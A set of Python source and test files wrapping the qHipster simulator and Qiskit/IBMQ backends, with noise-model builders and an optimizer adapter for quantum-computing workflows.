from .utils import save_symbolic_operator, make_circuit_qhipster_compatible
from openfermion.ops import SymbolicOperator
import numpy as np
class QHipsterSimulator(QuantumSimulator):
    """Backend wrapper that runs circuits through the qHipster simulator.

    Circuits and operators are serialized to JSON files in the working
    directory, converted with the qHipster command-line parsers, and then
    simulated by calling the qHipster binaries via subprocess.
    """

    supports_batching = False

    def __init__(self, n_samples=None, nthreads=1):
        """
        Args:
            n_samples (int): number of bitstring samples drawn per measurement
            nthreads (int): number of threads the qHipster binaries may use
        """
        super().__init__(n_samples=n_samples)
        self.nthreads = nthreads

        # NOTE: The environment variables that are set below are necessary for running qhipster with the intel psxe
        # runtime installation. They were obtained through sourcing the script
        # /app/usr/local/bin/compilers_and_library.sh which can be found in the zapatacomputing/qe-qhipster docker
        # image.
        os.putenv(
            "LD_LIBRARY_PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/lib/intel64/gcc4.7:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/lib/intel64:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib/release:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin",
        )
        os.putenv("IPPROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/ipp")
        os.putenv(
            "FI_PROVIDER_PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib/prov",
        )
        os.putenv(
            "CLASSPATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/daal.jar:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/lib/mpi.jar",
        )
        os.putenv(
            "CPATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/daal/include:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/include:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/include:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/include:",
        )
        os.putenv(
            "NLSPATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin/locale/%l_%t/%N:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin/locale/%l_%t/%N",
        )
        os.putenv(
            "LIBRARY_PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/daal/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/mkl/lib/intel64_lin:/opt/intel/psxe_runtime_2019.3.199/linux/tbb/lib/intel64/gcc4.7:/opt/intel/psxe_runtime_2019.3.199/linux/ipp/lib/intel64:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/lib:/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin",
        )
        os.putenv("DAALROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/daal")
        os.putenv(
            "MIC_LD_LIBRARY_PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/compiler/lib/intel64_lin_mic",
        )
        os.putenv("MANPATH", "/opt/intel/psxe_runtime_2019.3.199/linux/mpi/man:")
        os.putenv("CPLUS_INCLUDE_PATH", "/app/json_parser/include")
        os.putenv("MKLROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/mkl")
        os.putenv(
            "PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/libfabric/bin:/opt/intel/psxe_runtime_2019.3.199/linux/mpi/intel64/bin:/opt/intel/psxe_runtime_2019.3.199/linux/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
        )
        os.putenv("TBBROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/tbb")
        os.putenv(
            "PKG_CONFIG_PATH",
            "/opt/intel/psxe_runtime_2019.3.199/linux/mkl/bin/pkgconfig",
        )
        os.putenv("I_MPI_ROOT", "/opt/intel/psxe_runtime_2019.3.199/linux/mpi")

    def run_circuit_and_measure(self, circuit, **kwargs):
        """Sample ``self.n_samples`` bitstrings from the circuit's wavefunction.

        Args:
            circuit (zquantum.core.circuit.Circuit): state-preparation circuit

        Returns:
            zquantum.core.measurement.Measurements
        """
        # NOTE(review): circuit/job bookkeeping happens via the super() call
        # inside get_wavefunction — confirm counters are incremented there.
        wavefunction = self.get_wavefunction(circuit)
        return Measurements(sample_from_wavefunction(wavefunction, self.n_samples))

    def get_exact_expectation_values(self, circuit, qubit_operator, **kwargs):
        """Compute exact expectation values of each term of *qubit_operator*.

        Args:
            circuit (zquantum.core.circuit.Circuit): state-preparation circuit
            qubit_operator (openfermion.ops.SymbolicOperator): operator to measure

        Returns:
            zquantum.core.measurement.ExpectationValues: one real value per term,
            scaled by that term's coefficient.

        Raises:
            Exception: if the operator is not an openfermion SymbolicOperator.
        """
        self.number_of_circuits_run += 1
        self.number_of_jobs_run += 1
        circuit = make_circuit_qhipster_compatible(circuit)
        save_circuit(circuit, "./temp_qhipster_circuit.json")
        if isinstance(qubit_operator, SymbolicOperator):
            save_symbolic_operator(qubit_operator, "./temp_qhipster_operator.json")
        else:
            # Fix: the original concatenated a str with a type object, which
            # raised TypeError instead of the intended error message.
            raise Exception(
                f"Unsupported type: {type(qubit_operator)}. "
                "QHipster works only with openfermion.SymbolicOperator"
            )

        # Parse JSON files for qhipster usage
        subprocess.call(
            ["/app/json_parser/json_to_qasm.o", "./temp_qhipster_circuit.json"]
        )
        subprocess.call(
            [
                "/app/json_parser/qubitop_to_paulistrings.o",
                "./temp_qhipster_operator.json",
            ]
        )

        # Run simulation
        subprocess.call(
            [
                "/app/zapata/zapata_interpreter_no_mpi_get_exp_vals.out",
                "./temp_qhipster_circuit.txt",
                str(self.nthreads),
                "./temp_qhipster_operator.txt",
                "./expectation_values.json",
            ]
        )
        expectation_values = load_expectation_values("./expectation_values.json")

        # qHipster returns the raw per-term expectation values; multiply each
        # by its term coefficient. Term order follows qubit_operator.terms.
        for term_index, coefficient in enumerate(qubit_operator.terms.values()):
            expectation_values.values[term_index] = np.real(
                coefficient * expectation_values.values[term_index]
            )
        return expectation_values

    def get_wavefunction(self, circuit):
        """Simulate *circuit* and return the resulting wavefunction.

        Args:
            circuit (zquantum.core.circuit.Circuit): circuit to simulate

        Returns:
            pyquil.wavefunction.Wavefunction
        """
        super().get_wavefunction(circuit)
        # First, save the circuit object to file in JSON format
        circuit = make_circuit_qhipster_compatible(circuit)
        save_circuit(circuit, "./temp_qhipster_circuit.json")

        # Parse JSON files for qhipster usage
        subprocess.call(
            ["/app/json_parser/json_to_qasm.o", "./temp_qhipster_circuit.json"]
        )

        # Run simulation
        subprocess.call(
            [
                "/app/zapata/zapata_interpreter_no_mpi_get_wf.out",
                "./temp_qhipster_circuit.txt",
                str(self.nthreads),
                "./temp_qhipster_wavefunction.json",
            ]
        )
        wavefunction = load_wavefunction("./temp_qhipster_wavefunction.json")
        # Clean up the temp files written above. (NOTE(review):
        # get_exact_expectation_values leaves its temp files behind — confirm
        # whether that is intentional.)
        os.remove("./temp_qhipster_circuit.json")
        os.remove("./temp_qhipster_wavefunction.json")
        return wavefunction
--- FILE SEPARATOR ---
import pytest
from zquantum.core.interfaces.backend_test import (
QuantumSimulatorTests,
QuantumSimulatorGatesTest,
)
from .simulator import QHipsterSimulator
@pytest.fixture(
    params=[
        {},
        {"n_samples": 1000},
    ]
)
def backend(request):
    # Parametrized over the default configuration and a sampling one.
    return QHipsterSimulator(**request.param)
@pytest.fixture(
    params=[
        {},
    ]
)
def wf_simulator(request):
    # Wavefunction tests only need the default (no-sampling) configuration.
    return QHipsterSimulator(**request.param)
class TestQHipster(QuantumSimulatorTests):
    # Runs the shared zquantum simulator contract tests against qHipster.
    pass
class TestQHipsterGates(QuantumSimulatorGatesTest):
    # XX/YY/ZZ are rejected by the qHipster integration (see utils), so the
    # shared gate tests must skip them.
    gates_to_exclude = ["XX", "YY", "ZZ"]
    pass
--- FILE SEPARATOR ---
from openfermion import SymbolicOperator
import numpy as np
import json
def save_symbolic_operator(op: SymbolicOperator, filename: str) -> None:
    """Serialize *op* to *filename* as JSON under an "expression" key."""
    payload = {"expression": convert_symbolic_op_to_string(op)}
    with open(filename, "w") as output_file:
        json.dump(payload, output_file, indent=2)
def convert_symbolic_op_to_string(
    op: "SymbolicOperator", coefficient_cutoff: float = 1e-8
) -> str:
    """Convert an openfermion SymbolicOperator to a string. This differs from the
    SymbolicOperator's __str__ method only in that we preserve the order of terms.
    Adapted from openfermion.

    Args:
        op: the operator
        coefficient_cutoff: terms whose coefficient magnitude falls below this
            threshold are omitted (previously a hard-coded 1e-8)

    Returns
        string: the string representation of the operator; "0" when empty
    """
    if not op.terms:
        return "0"
    string_rep = ""
    for term, coeff in op.terms.items():
        # Skip numerically negligible terms. Builtin abs() handles both real
        # and complex coefficients; numpy is not needed here.
        if abs(coeff) < coefficient_cutoff:
            continue
        tmp_string = "{} [".format(coeff)
        for index, action in term:
            action_string = op.action_strings[op.actions.index(action)]
            if op.action_before_index:
                tmp_string += "{}{} ".format(action_string, index)
            else:
                tmp_string += "{}{} ".format(index, action_string)
        string_rep += "{}] +\n".format(tmp_string.strip())
    # Drop the trailing " +\n" left by the final term.
    return string_rep[:-3]
def make_circuit_qhipster_compatible(circuit):
    """Rewrite gates that qHipster cannot execute directly (I, XX, YY, ZZ)."""
    return replace_XX_YY_ZZ_gates_with_decomposition(
        replace_identity_gates_with_rx(circuit)
    )
def replace_identity_gates_with_rx(circuit):
    """Replace every identity gate with an equivalent Rx(0) rotation.

    qHipster has no identity gate, but an Rx with zero angle acts the same.
    The circuit is modified in place and returned.
    """
    identity_gates = (gate for gate in circuit.gates if gate.name == "I")
    for gate in identity_gates:
        gate.name = "Rx"
        gate.params = [0]
    return circuit
def replace_XX_YY_ZZ_gates_with_decomposition(circuit):
    """Reject two-qubit XX/YY/ZZ gates, which qHipster cannot run.

    Despite the name, no decomposition is implemented yet; encountering one
    of these gates raises NotImplementedError. Otherwise the circuit is
    returned unchanged.
    """
    unsupported = {
        "XX": "XX gate is currently not supported for qHipster integration.",
        "YY": "YY gate is currently not supported for qHipster integration.",
        "ZZ": "ZZ gate is currently not supported for qHipster integration.",
    }
    for gate in circuit.gates:
        message = unsupported.get(gate.name)
        if message is not None:
            raise NotImplementedError(message)
    return circuit
|
[
"/src/python/qeqhipster/simulator.py",
"/src/python/qeqhipster/simulator_test.py",
"/src/python/qeqhipster/utils.py"
] |
00mjk/qe-qiskit
|
from qiskit import IBMQ, execute, QuantumRegister
from qiskit.ignis.mitigation.measurement import (
complete_meas_cal,
CompleteMeasFitter,
)
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from openfermion.ops import IsingOperator
from zquantum.core.openfermion import change_operator_type
from zquantum.core.interfaces.backend import QuantumBackend
from zquantum.core.measurement import (
expectation_values_to_real,
Measurements,
)
class QiskitBackend(QuantumBackend):
    """zquantum QuantumBackend implementation backed by an IBMQ device."""

    def __init__(
        self,
        device_name,
        n_samples=None,
        hub="ibm-q",
        group="open",
        project="main",
        api_token=None,
        batch_size=75,
        readout_correction=False,
        optimization_level=0,
        **kwargs
    ):
        """Get a qiskit QPU that adheres to the
        zquantum.core.interfaces.backend.QuantumBackend

        Args:
            device_name (string): the name of the device
            n_samples (int): the number of samples to use when running the device
            hub (string): IBMQ hub
            group (string): IBMQ group
            project (string): IBMQ project
            api_token (string): IBMQ Api Token
            batch_size (int): maximum number of circuits submitted per IBMQ job
            readout_correction (bool): indication of whether or not to use basic readout correction
            optimization_level (int): optimization level for the default qiskit transpiler (0, 1, 2, or 3)

        Returns:
            qeqiskit.backend.QiskitBackend
        """
        self.device_name = device_name
        self.n_samples = n_samples
        self.batch_size = batch_size
        if api_token is not None:
            try:
                IBMQ.enable_account(api_token)
            except IBMQAccountError as e:
                # Re-enabling the same account mid-session is harmless; any
                # other account error is fatal.
                if (
                    e.message
                    != "An IBM Quantum Experience account is already in use for the session."
                ):
                    raise RuntimeError(e)
        provider = IBMQ.get_provider(hub=hub, group=group, project=project)
        self.device = provider.get_backend(name=self.device_name)
        self.readout_correction = readout_correction
        self.readout_correction_filter = None  # built lazily on first use
        self.optimization_level = optimization_level

    @staticmethod
    def _counts_to_measurements(raw_counts):
        # qiskit counts map bitstrings in reversed (little-endian) order, so
        # flip each bitstring before building the Measurements object.
        reversed_counts = {
            bitstring[::-1]: int(count) for bitstring, count in raw_counts.items()
        }
        return Measurements.from_counts(reversed_counts)

    def run_circuit_and_measure(self, circuit, **kwargs):
        """Run a circuit and measure a certain number of bitstrings. Note: the
        number of bitstrings measured is derived from self.n_samples

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state

        Returns:
            zquantum.core.measurement.Measurements
        """
        num_qubits = len(circuit.qubits)
        ibmq_circuit = circuit.to_qiskit()
        ibmq_circuit.barrier(range(num_qubits))
        ibmq_circuit.measure(range(num_qubits), range(num_qubits))

        # Run job on device and get counts
        raw_counts = (
            execute(
                ibmq_circuit,
                self.device,
                shots=self.n_samples,
                optimization_level=self.optimization_level,
            )
            .result()
            .get_counts()
        )

        if self.readout_correction:
            # Fix: kwargs used to be passed positionally, so the whole dict
            # was bound to the qubit_list parameter.
            raw_counts = self.apply_readout_correction(raw_counts, **kwargs)

        return self._counts_to_measurements(raw_counts)

    def run_circuitset_and_measure(self, circuitset, **kwargs):
        """Run a set of circuits and measure a certain number of bitstrings.
        Note: the number of bitstrings measured is derived from self.n_samples

        Args:
            circuitset (List[zquantum.core.circuit.Circuit]): the circuits to run

        Returns:
            List[zquantum.core.measurement.Measurements]: one entry per circuit
        """
        ibmq_circuitset = []
        for circuit in circuitset:
            num_qubits = len(circuit.qubits)
            ibmq_circuit = circuit.to_qiskit()
            ibmq_circuit.barrier(range(num_qubits))
            ibmq_circuit.measure(range(num_qubits), range(num_qubits))
            ibmq_circuitset.append(ibmq_circuit)

        # Split the circuits into batches of at most self.batch_size and
        # submit one job per batch.
        experiments = [
            ibmq_circuitset[start : start + self.batch_size]
            for start in range(0, len(ibmq_circuitset), self.batch_size)
        ]
        jobs = [
            execute(
                experiment,
                self.device,
                shots=self.n_samples,
                optimization_level=self.optimization_level,
            )
            for experiment in experiments
        ]

        measurements_set = []
        for i, ibmq_circuit in enumerate(ibmq_circuitset):
            # Circuit i lives in batch i // batch_size.
            job = jobs[i // self.batch_size]
            circuit_counts = job.result().get_counts(ibmq_circuit)

            if self.readout_correction:
                # Fix: kwargs used to be passed positionally as qubit_list.
                circuit_counts = self.apply_readout_correction(
                    circuit_counts, **kwargs
                )

            measurements_set.append(self._counts_to_measurements(circuit_counts))
        return measurements_set

    def get_expectation_values(self, circuit, operator, **kwargs):
        """Run a circuit and measure the expectation values with respect to a
        given operator. Note: the number of bitstrings measured is derived
        from self.n_samples - if self.n_samples = None, then this will use
        self.get_exact_expectation_values

        Args:
            circuit (zquantum.core.circuit.Circuit): the circuit to prepare the state
            operator (openfermion.ops.IsingOperator or openfermion.ops.QubitOperator): the operator to measure

        Returns:
            zquantum.core.measurement.ExpectationValues: the expectation values of each term in the operator
        """
        operator = change_operator_type(operator, IsingOperator)
        measurements = self.run_circuit_and_measure(circuit)
        expectation_values = measurements.get_expectation_values(operator)
        return expectation_values_to_real(expectation_values)

    def get_expectation_values_for_circuitset(self, circuitset, operator, **kwargs):
        """Run a set of circuits and measure the expectation values with respect to a
        given operator.

        Args:
            circuitset (list of zquantum.core.circuit.Circuit objects): the circuits to prepare the states
            operator (openfermion.ops.IsingOperator or openfermion.ops.QubitOperator): the operator to measure

        Returns:
            list of zquantum.core.measurement.ExpectationValues objects: a list of the expectation values of each
                term in the operator with respect to the various state preparation circuits
        """
        operator = change_operator_type(operator, IsingOperator)
        measurements_set = self.run_circuitset_and_measure(circuitset)
        return [
            expectation_values_to_real(
                measurements.get_expectation_values(operator)
            )
            for measurements in measurements_set
        ]

    def apply_readout_correction(self, counts, qubit_list=None, **kwargs):
        """Apply (and lazily build) a complete measurement-error filter.

        Args:
            counts: raw qiskit counts dictionary
            qubit_list: qubits to calibrate over; defaults to all qubits
                appearing in the counts bitstrings

        Returns:
            The readout-mitigated counts.
        """
        if self.readout_correction_filter is None:
            # Infer the qubit count from the length of any counts bitstring.
            num_qubits = len(next(iter(counts)))

            if qubit_list is None or qubit_list == {}:
                qubit_list = list(range(num_qubits))

            qr = QuantumRegister(num_qubits)
            meas_cals, state_labels = complete_meas_cal(qubit_list=qubit_list, qr=qr)

            # Execute the calibration circuits
            job = execute(meas_cals, self.device, shots=self.n_samples)
            cal_results = job.result()

            # Make a calibration matrix
            meas_fitter = CompleteMeasFitter(cal_results, state_labels)
            # Create a measurement filter from the calibration matrix
            self.readout_correction_filter = meas_fitter.filter

        mitigated_counts = self.readout_correction_filter.apply(counts)
        return mitigated_counts
--- FILE SEPARATOR ---
import pytest
import os
from pyquil import Program
from pyquil.gates import X, CNOT
from qiskit import IBMQ
from qiskit.providers.exceptions import QiskitBackendNotFoundError
from zquantum.core.circuit import Circuit
from zquantum.core.interfaces.backend_test import QuantumBackendTests
from .backend import QiskitBackend
@pytest.fixture(
    params=[
        {
            "device_name": "ibmq_qasm_simulator",
            "n_samples": 1,
            "api_token": os.getenv("ZAPATA_IBMQ_API_TOKEN"),
        },
    ]
)
def backend(request):
    # Requires a valid token in ZAPATA_IBMQ_API_TOKEN and network access.
    return QiskitBackend(**request.param)
class TestQiskitBackend(QuantumBackendTests):
    """Integration tests against the IBMQ qasm simulator.

    These run the shared QuantumBackendTests contract plus readout-correction
    checks; all of them need a valid ZAPATA_IBMQ_API_TOKEN and network access.
    """

    def test_run_circuitset_and_measure(self, backend):
        # Given
        num_circuits = 10
        circuit = Circuit(Program(X(0), CNOT(1, 2)))
        n_samples = 100
        # When
        backend.n_samples = n_samples
        measurements_set = backend.run_circuitset_and_measure([circuit] * num_circuits)
        # Then
        assert len(measurements_set) == num_circuits
        for measurements in measurements_set:
            assert len(measurements.bitstrings) == n_samples

            # Then (since SPAM error could result in unexpected bitstrings, we make sure the most common bitstring is
            # the one we expect)
            counts = measurements.get_counts()
            assert max(counts, key=counts.get) == "100"

    def test_readout_correction_works_run_circuit_and_measure(self):
        # Given
        ibmq_api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
        backend = QiskitBackend(
            device_name="ibmq_qasm_simulator",
            n_samples=1000,
            api_token=ibmq_api_token,
            readout_correction=True,
        )
        circuit = Circuit(Program(X(0), CNOT(1, 2)))

        # When
        backend.run_circuit_and_measure(circuit)

        # Then: the correction filter is built lazily on first use.
        assert backend.readout_correction
        assert backend.readout_correction_filter is not None

    def test_readout_correction_works_run_circuitset_and_measure(self):
        # Given
        ibmq_api_token = os.getenv("ZAPATA_IBMQ_API_TOKEN")
        backend = QiskitBackend(
            device_name="ibmq_qasm_simulator",
            n_samples=1000,
            api_token=ibmq_api_token,
            readout_correction=True,
        )
        circuit = Circuit(Program(X(0), CNOT(1, 2)))

        # When
        backend.run_circuitset_and_measure([circuit] * 10)

        # Then: the correction filter is built lazily on first use.
        assert backend.readout_correction
        assert backend.readout_correction_filter is not None

    def test_device_that_does_not_exist(self):
        # Given/When/Then
        with pytest.raises(QiskitBackendNotFoundError):
            QiskitBackend("DEVICE DOES NOT EXIST")
--- FILE SEPARATOR ---
from .basic import get_qiskit_noise_model
--- FILE SEPARATOR ---
import numpy as np
import qiskit.providers.aer.noise as AerNoise
from qiskit import IBMQ
from qiskit.providers.ibmq.exceptions import IBMQAccountError
from zquantum.core.circuit import CircuitConnectivity
from qiskit.providers.aer.noise import (amplitude_damping_error,
phase_damping_error,
phase_amplitude_damping_error,
pauli_error)
from qiskit.providers.aer.noise import NoiseModel
from qiskit.quantum_info import Kraus
def get_qiskit_noise_model(
    device_name, hub="ibm-q", group="open", project="main", api_token=None
):
    """ Get a qiskit noise model to use noisy simulations with a qiskit simulator

    Args:
        device_name (string): The name of the device trying to be emulated
        hub (string): The ibmq hub (see qiskit documentation)
        group (string): The ibmq group (see qiskit documentation)
        project (string): The ibmq project (see qiskit documentation)
        api_token (string): The ibmq api token (see qiskit documentation)

    Returns:
        qiskit.providers.aer.noise.NoiseModel
        zquantum.core.circuit.CircuitConnectivity: the qubit connectivity of the device
    """
    # Fix: the original used ``api_token is not "None"`` — identity comparison
    # with a string literal is implementation-dependent; use equality. The
    # string "None" can arrive from workflow templating.
    if api_token is not None and api_token != "None":
        try:
            IBMQ.enable_account(api_token)
        except IBMQAccountError as e:
            # Re-enabling the same account mid-session is harmless; anything
            # else is fatal.
            if (
                e.message
                != "An IBM Quantum Experience account is already in use for the session."
            ):
                raise RuntimeError(e)

    # Get qiskit noise model from qiskit
    provider = IBMQ.get_provider(hub=hub, group=group, project=project)
    noisy_device = provider.get_backend(device_name)

    noise_model = AerNoise.NoiseModel.from_backend(noisy_device)
    coupling_map = noisy_device.configuration().coupling_map

    return noise_model, CircuitConnectivity(coupling_map)
def create_amplitude_damping_noise(T_1, t_step=10e-9):
    """ Creates an amplitude damping noise model

    Args:
        T_1 (float) : Relaxation time (seconds)
        t_step (float) : Discretized time step over which the relaxation occurs over (seconds)

    Returns:
        qiskit.providers.aer.noise.NoiseModel
    """
    # Damping probability accumulated over one time step.
    gamma = 1 - pow(np.e, -1 / T_1 * t_step)
    single_qubit_error = amplitude_damping_error(gamma)
    two_qubit_error = single_qubit_error.tensor(single_qubit_error)

    noise_model = NoiseModel()
    noise_model.add_all_qubit_quantum_error(single_qubit_error, ['id', 'u3'])
    noise_model.add_all_qubit_quantum_error(two_qubit_error, ['cx'])
    return noise_model
def create_phase_damping_noise(T_2, t_step=10e-9):
    """ Creates a dephasing noise model

    Args:
        T_2 (float) : dephasing time (seconds)
        t_step (float) : Discretized time step over which the relaxation occurs over (seconds)

    Returns:
        qiskit.providers.aer.noise.NoiseModel
    """
    # Dephasing probability accumulated over one time step.
    gamma = 1 - pow(np.e, -1 / T_2 * t_step)
    single_qubit_error = phase_damping_error(gamma)
    two_qubit_error = single_qubit_error.tensor(single_qubit_error)

    noise_model = NoiseModel()
    noise_model.add_all_qubit_quantum_error(single_qubit_error, ['id', 'u3'])
    noise_model.add_all_qubit_quantum_error(two_qubit_error, ['cx'])
    return noise_model
def create_phase_and_amplitude_damping_error(T_1, T_2, t_step=10e-9):
    """ Creates a noise model that does both phase and amplitude damping

    Args:
        T_1 (float) : Relaxation time (seconds)
        T_2 (float) : dephasing time (seonds)
        t_step (float) : Discretized time step over which the relaxation occurs over (seconds)

    Returns:
        qiskit.providers.aer.noise.NoiseModel
    """
    # Per-step damping probabilities for each channel.
    param_amp = 1 - pow(np.e, -1 / T_1 * t_step)
    param_phase = 1 - pow(np.e, -1 / T_2 * t_step)
    single_qubit_error = phase_amplitude_damping_error(param_amp, param_phase)
    two_qubit_error = single_qubit_error.tensor(single_qubit_error)

    noise_model = NoiseModel()
    noise_model.add_all_qubit_quantum_error(single_qubit_error, ['id', 'u3'])
    noise_model.add_all_qubit_quantum_error(two_qubit_error, ['cx'])
    return noise_model
def create_pta_channel(T_1, T_2, t_step=10e-9):
    """ Creates a noise model that does both phase and amplitude damping but in the
    Pauli Twirling Approximation discussed the following reference
    https://arxiv.org/pdf/1305.2021.pdf

    Args:
        T_1 (float) : Relaxation time (seconds)
        T_2 (float) : dephasing time (seconds)
        t_step (float) : Discretized time step over which the relaxation occurs over (seconds)

    Returns:
        qiskit.providers.aer.noise.NoiseModel
    """
    if T_1 == T_2:
        # With T_1 == T_2, 1/T_phi = 1/T_2 - 1/(2*T_1) reduces to 1/(2*T_1).
        t_phi = 2*T_1
    elif 2*T_1 == T_2:
        # Pure amplitude damping has no separate dephasing channel.
        raise RuntimeError(" T_2 == 2*T_1 only in a pure amplitude damping case ")
    else:
        # NOTE(review): from 1/T_phi = 1/T_2 - 1/(2*T_1) one would expect
        # t_phi = 2*T_1*T_2 / (2*T_1 - T_2); the difference below is
        # dimensionally suspect (and negative when T_2 < 2*T_1) — confirm
        # against the paper referenced in the docstring.
        t_phi = T_2 - 2*T_1
    # Pauli-twirled error probabilities for one time step (eqs. from the
    # reference above).
    p_x = 0.25*(1- pow(np.e, - t_step/T_1))
    p_y = 0.25*(1- pow(np.e, - t_step/T_1))
    exp_1 = pow(np.e, -t_step/(2*T_1))
    exp_2 = pow(np.e, -t_step/t_phi)
    p_z = (0.5 - p_x - 0.5*exp_1*exp_2)
    # Remaining probability mass goes to the identity.
    p_i = 1 - p_x - p_y - p_z

    errors = [('X', p_x), ('Y', p_y), ('Z', p_z), ('I', p_i)]
    pta_error = pauli_error(errors)
    noise_model = NoiseModel()
    noise_model.add_all_qubit_quantum_error(pta_error, ['id', 'u3'])
    # Two-qubit gates get the tensor product of the single-qubit channel.
    gate_error = pta_error.tensor(pta_error)
    noise_model.add_all_qubit_quantum_error(gate_error, ['cx'])
    return noise_model
def get_kraus_matrices_from_ibm_noise_model(noise_model):
    """Gets the kraus operators from a pre defined noise model

    Args:
        noise_model (qiskit.providers.aer.noise.NoiseModel): Noise model for circuit

    Return
        dict_of_kraus_operators(dict): A dictionary labelled by keys which are the basis gates and values are the list of kraus operators
    """
    # NOTE(review): this reads the private attribute _default_quantum_errors,
    # which may break across qiskit-aer versions — confirm there is no public
    # accessor in the pinned version.
    retrieved_quantum_error_dict = noise_model._default_quantum_errors
    dict_of_kraus_operators = { gate: Kraus(retrieved_quantum_error_dict[gate]).data for gate in retrieved_quantum_error_dict }
    return dict_of_kraus_operators
--- FILE SEPARATOR ---
from .optimizer import QiskitOptimizer
--- FILE SEPARATOR ---
from zquantum.core.history.recorder import recorder
from zquantum.core.interfaces.optimizer import Optimizer, optimization_result
from qiskit.aqua.components.optimizers import SPSA, ADAM
from scipy.optimize import OptimizeResult
class _CostFunctionWrapper:
def __init__(self, cost_function):
self.cost_function = cost_function
self.number_of_calls = 0
def __call__(self, params):
self.number_of_calls += 1
return self.cost_function(params)
class QiskitOptimizer(Optimizer):
    """Adapter exposing Qiskit Aqua optimizers through the zquantum Optimizer interface."""

    def __init__(self, method, options=None):
        """
        Args:
            method(str): specifies optimizer to be used. Currently supports "ADAM", "AMSGRAD" and "SPSA".
            options(dict): dictionary with additional options for the optimizer.

        Supported values for the options dictionary:
        Options:
            keep_value_history(bool): boolean flag indicating whether the history of evaluations should be stored or not.
            **kwargs: options specific for particular scipy optimizers.
        """
        self.method = method
        # Copy the options so we never mutate the caller's dict. The original
        # used a mutable default (options={}) and then mutated it via pop()
        # and item assignment, sharing state across all instances.
        self.options = dict(options) if options is not None else {}
        self.keep_value_history = self.options.pop("keep_value_history", False)

    def minimize(self, cost_function, initial_params=None):
        """
        Minimizes given cost function using optimizers from Qiskit Aqua.

        Args:
            cost_function(): python method which takes numpy.ndarray as input
            initial_params(np.ndarray): initial parameters to be used for optimization

        Returns:
            optimization_results(scipy.optimize.OptimizeResults): results of the optimization.

        Raises:
            ValueError: if self.method is not one of the supported methods.
        """
        if self.method == "SPSA":
            optimizer = SPSA(**self.options)
        elif self.method in ("ADAM", "AMSGRAD"):
            if self.method == "AMSGRAD":
                self.options["amsgrad"] = True
            optimizer = ADAM(**self.options)
        else:
            # The original silently fell through to an unbound ``optimizer``
            # name (NameError); fail with a clear message instead.
            raise ValueError(f"Unsupported method: {self.method}")

        number_of_variables = len(initial_params)

        # The recorder keeps the full evaluation history; the lightweight
        # wrapper only counts calls.
        if self.keep_value_history:
            cost_function_wrapper = recorder(cost_function)
        else:
            cost_function_wrapper = _CostFunctionWrapper(cost_function)

        gradient_function = None
        if callable(getattr(cost_function, "gradient", None)):
            gradient_function = cost_function.gradient

        solution, value, nit = optimizer.optimize(
            num_vars=number_of_variables,
            objective_function=cost_function_wrapper,
            initial_point=initial_params,
            gradient_function=gradient_function,
        )

        if self.keep_value_history:
            history = cost_function_wrapper.history
            nfev = len(history)
        else:
            history = []
            nfev = cost_function_wrapper.number_of_calls

        return optimization_result(
            opt_value=value,
            opt_params=solution,
            nit=nit,
            history=history,
            nfev=nfev,
        )
--- FILE SEPARATOR ---
import unittest
from zquantum.core.history.recorder import recorder
from .optimizer import QiskitOptimizer
from zquantum.core.interfaces.optimizer_test import OptimizerTests
import numpy as np
from zquantum.core.interfaces.optimizer_test import sum_x_squared
class QiskitOptimizerTests(unittest.TestCase, OptimizerTests):
    """Runs the shared OptimizerTests contract plus history-recording checks."""

    def setUp(self):
        # One instance per supported method; SPSA gets tightened step-size
        # coefficients so the shared contract tests converge.
        self.optimizers = [
            QiskitOptimizer(method="ADAM"),
            QiskitOptimizer(
                method="SPSA",
                options={
                    "max_trials": int(1e5),
                    "c0": 1e-3,
                    "c1": 1e-4,
                    "c2": 1e-3,
                    "c3": 1e-4,
                },
            ),
            QiskitOptimizer(
                method="AMSGRAD", options={"maxiter": 2e5, "tol": 1e-9, "lr": 1e-4}
            ),
        ]

    def test_optimizer_succeeds_on_cost_function_without_gradient(self):
        for optimizer in self.optimizers:
            cost_function = sum_x_squared

            results = optimizer.minimize(
                cost_function, initial_params=np.array([1, -1])
            )
            # The minimum of sum(x^2) is 0 at the origin.
            self.assertAlmostEqual(results.opt_value, 0, places=5)
            self.assertAlmostEqual(results.opt_params[0], 0, places=4)
            self.assertAlmostEqual(results.opt_params[1], 0, places=4)

            self.assertIn("nfev", results.keys())
            self.assertIn("nit", results.keys())
            self.assertIn("opt_value", results.keys())
            self.assertIn("opt_params", results.keys())
            self.assertIn("history", results.keys())

